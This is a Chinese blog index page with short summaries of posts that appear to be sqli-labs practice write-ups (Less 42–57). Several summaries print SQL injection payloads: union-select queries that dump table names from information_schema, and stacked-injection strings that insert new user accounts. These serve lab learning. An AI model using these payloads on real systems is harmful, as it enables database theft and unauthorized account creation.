摘要: 1.和less(54)差不多, "闭合 2.爆破 (1)爆表:?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ (2)爆 阅读全文
posted @ 2020-03-24 11:21 孟雨 阅读(100) 评论(0) 推荐(0) 编辑
摘要: 1.和Less(54)差不多, ')闭合 2.爆破 (1)爆表:?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ (2 阅读全文
posted @ 2020-03-24 11:13 孟雨 阅读(95) 评论(0) 推荐(0) 编辑
摘要: 1.告诉了测试次数14次, union测试 数据库challenges 和Less(54)差不多, ) 闭合 2.爆破 (1)爆表:?id=0) union select 1,2,group_concat(table_name) from information_schema.tables wher 阅读全文
posted @ 2020-03-24 11:03 孟雨 阅读(141) 评论(0) 推荐(0) 编辑
摘要: 1.查看php文件:kek下面的那段是未为了控制查询粗疏 2.爆破 (1)爆数据库:?id=0' union select 1,2,database()--+ (2)爆表名:?id=0' union select 1,2,group_concat(table_name) from informati 阅读全文
posted @ 2020-03-24 10:48 孟雨 阅读(155) 评论(0) 推荐(0) 编辑
摘要: 1.单引号闭合 ?sort=1' 没有报错 ?sort=1" 2.报错信息不会在前台显示,我们采用 stacked injection 方法 :?sort=1';insert into users(id,username,password) value (21,'less53','less53')- 阅读全文
posted @ 2020-03-24 10:26 孟雨 阅读(133) 评论(0) 推荐(0) 编辑
摘要: 1.出错别关闭了 ?sort=1' 2.报错信息不会在前台显示,我们采用 stacked injection 方法 :?sort=1;insert into users(id,username,password) value (20,'root','root') 3.也可以用盲注 原文链接:http 阅读全文
posted @ 2020-03-24 09:44 孟雨 阅读(107) 评论(0) 推荐(0) 编辑
摘要: 1.这道题还是一道盲注,bp抓包,尝试各种闭合,当试到为')时成功写入新用户 阅读全文
posted @ 2020-03-14 16:08 孟雨 阅读(122) 评论(0) 推荐(0) 编辑
摘要: 1.这道题没有报错回显,是一道盲注,经过测试,语句和Less(42)一样 阅读全文
posted @ 2020-03-14 15:55 孟雨 阅读(146) 评论(0) 推荐(0) 编辑
摘要: 1.和Less(42)差不都 ')闭合 阅读全文
posted @ 2020-03-14 15:51 孟雨 阅读(105) 评论(0) 推荐(0) 编辑
摘要: 1.bp抓包,账号处没有注入点,而密码有且没有任何加工处理,语句如图 阅读全文
posted @ 2020-03-14 15:48 孟雨 阅读(130) 评论(0) 推荐(0) 编辑